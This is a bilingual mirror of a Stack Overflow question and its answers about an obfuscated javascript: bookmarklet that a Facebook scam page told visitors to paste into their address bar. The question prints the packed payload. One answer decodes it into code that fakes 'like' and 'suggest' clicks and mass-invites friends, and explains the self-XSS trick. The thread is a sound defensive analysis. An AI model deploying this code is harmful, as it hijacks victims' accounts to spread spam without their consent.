这段 JavaScript 到底做了什么?
声明:本页面是StackOverFlow热门问题的中英对照翻译,遵循CC BY-SA 4.0协议,如果您需要使用它,必须同样遵循CC BY-SA许可,注明原文地址和作者信息,同时你必须将它归于原作者(不是我):StackOverFlow
原文地址: http://stackoverflow.com/questions/2731345/
Warning: these are provided under cc-by-sa 4.0 license. You are free to use/share it, But you must attribute it to the original authors (not me):
StackOverFlow
What exactly does this piece of JavaScript do?
提问by Waltzy
I saw this page growing in popularity among my social circles on Facebook, what 98 percent bla bla...and it walks users through copying the below JavaScript (I added some indentation to make it more readable) into their address bar. Looks dodgy to me, but I only have a very basic knowledge of JavaScript.
我看到这个页面在我的 Facebook 社交圈中越来越受欢迎,98% 的 bla bla ......它引导用户将下面的 JavaScript(我添加了一些缩进以使其更具可读性)复制到他们的地址栏中。对我来说看起来很狡猾,但我只有非常基本的 JavaScript 知识。
Simply put, what does this do?
简单来说,这有什么作用?
javascript:(function(){
a='app120668947950042_jop';
b='app120668947950042_jode';
ifc='app120668947950042_ifc';
ifo='app120668947950042_ifo';
mw='app120668947950042_mwrapper';
eval(function(p,a,c,k,e,r){
e=function(c){
return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))}
;
if(!''.replace(/^/,String)){
while(c--)r[e(c)]=k[c]||e(c);
k=[function(e){
return r[e]}
];
e=function(){
return'\w+'}
;
c=1}
;
while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);
return p}
('J e=["\n\g\j\g\F\g\i\g\h\A","\j\h\A\i\f","\o\f\h\q\i\f\r\f\k\h\K\A\L\t","\w\g\t\t\f\k","\g\k\k\f\x\M\N\G\O","\n\l\i\y\f","\j\y\o\o\f\j\h","\i\g\H\f\r\f","\G\u\y\j\f\q\n\f\k\h\j","\p\x\f\l\h\f\q\n\f\k\h","\p\i\g\p\H","\g\k\g\h\q\n\f\k\h","\t\g\j\z\l\h\p\w\q\n\f\k\h","\j\f\i\f\p\h\v\l\i\i","\j\o\r\v\g\k\n\g\h\f\v\P\u\x\r","\B\l\Q\l\R\B\j\u\p\g\l\i\v\o\x\l\z\w\B\g\k\n\g\h\f\v\t\g\l\i\u\o\S\z\w\z","\j\y\F\r\g\h\T\g\l\i\u\o"];
d=U;
d[e[2]](V)[e[1]][e[0]]=e[3];
d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];
s=d[e[2]](e[6]);
m=d[e[2]](e[7]);
c=d[e[9]](e[8]);
c[e[11]](e[10],I,I);
s[e[12]](c);
C(D(){
W[e[13]]()}
,E);
C(D(){
X[e[16]](e[14],e[15])}
,E);
C(D(){
m[e[12]](c);
d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]}
,E);
',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{
}
))})();
回答by bobince
I don't know so many are downvoting this. You are absolutely right to be suspicious about packed and otherwise-obfuscated scripts, especially with the rash of malvertisements affecting FB apps at the moment.
我不知道有这么多人反对这个。您对打包和以其他方式混淆的脚本表示怀疑是绝对正确的,尤其是在目前影响 FB 应用程序的恶意广告泛滥的情况下。
The first trick is to replace the evalon the results of the unpacker with an alertso you can see the code instead of executing it. That gives you something you can easily (but boringly) manually decode to:
第一个技巧是eval用 an替换解包器的结果,alert这样您就可以看到代码而不是执行它。这为您提供了一些您可以轻松(但很无聊)手动解码的内容:
document.getElementById('app120668947950042_mwrapper').style.visibility='hidden';
document.getElementById('app120668947950042_jop').innerHTML=document.getElementById('app120668947950042_jode').value;
s=document.getElementById('suggest');
m=document.getElementById('likeme');
c=document.createEvent('MouseEvents');
c.initEvent('click',true,true);
s.dispatchEvent(c);
setTimeout(function(){
fs.select_all()
}, 5000);
setTimeout(function(){
SocialGraphManager.submitDialog('sgm_invite_form','/ajax/social_graph/invite_dialog.php')
}, 5000);
setTimeout(function(){
m.dispatchEvent(c);
document.getElementById('app120668947950042_ifo').innerHTML=document.getElementById('app120668947950042_ifc').value
}, 5000);
That looks like it's faking click on the ‘like' and ‘suggest' buttons (and subsequent dialogue), circumventing the normal controls FB require to interact with the site.
这看起来像是假点击“喜欢”和“建议”按钮(以及随后的对话),绕过了 FB 与站点交互所需的正常控件。
I'd report this page to FB.
我会向 FB 报告此页面。
In general, anything that asks you to enter a JavaScript URL is up to no good. This is the poor-man's-XSS. By allowing someone's code onto a page through a JS URL you are trusting them to do anything they want with your use of the site, as this crude social-engineering attempt demonstrates. It's depressing if a lot of people are falling for this. Maybe it's time for browsers to disallow typing javascript:URLs in the address bar.
一般而言,任何要求您输入 JavaScript URL 的内容都无济于事。这是穷人的XSS。通过允许某人通过 JS URL 将代码添加到页面上,您相信他们可以在您使用网站时做任何他们想做的事情,正如这个粗略的社会工程尝试所证明的那样。如果很多人都为此而堕落,那真是令人沮丧。也许是浏览器禁止javascript:在地址栏中键入URL 的时候了。
Curse you Netscape for inventing the ugly javascript:not-really-a-URL hack and the thousands of security holes that have resulted from it!
诅咒你 Netscape 发明了丑陋javascript:的非 URL hack 以及由此产生的数千个安全漏洞!
回答by Mitch Dempsey
At first glance, it looks like a packing function, used to compress code into a string. Think of it like gzip compression.
乍一看,它看起来像一个打包函数,用于将代码压缩成字符串。把它想象成 gzip 压缩。
回答by joshowen
That looks like the code invite your friends to join a group or something along those lines..
这看起来像代码邀请你的朋友加入一个小组或类似的东西..
They've been floating around facebook for a while.
他们已经在 facebook 上闲逛了一段时间。
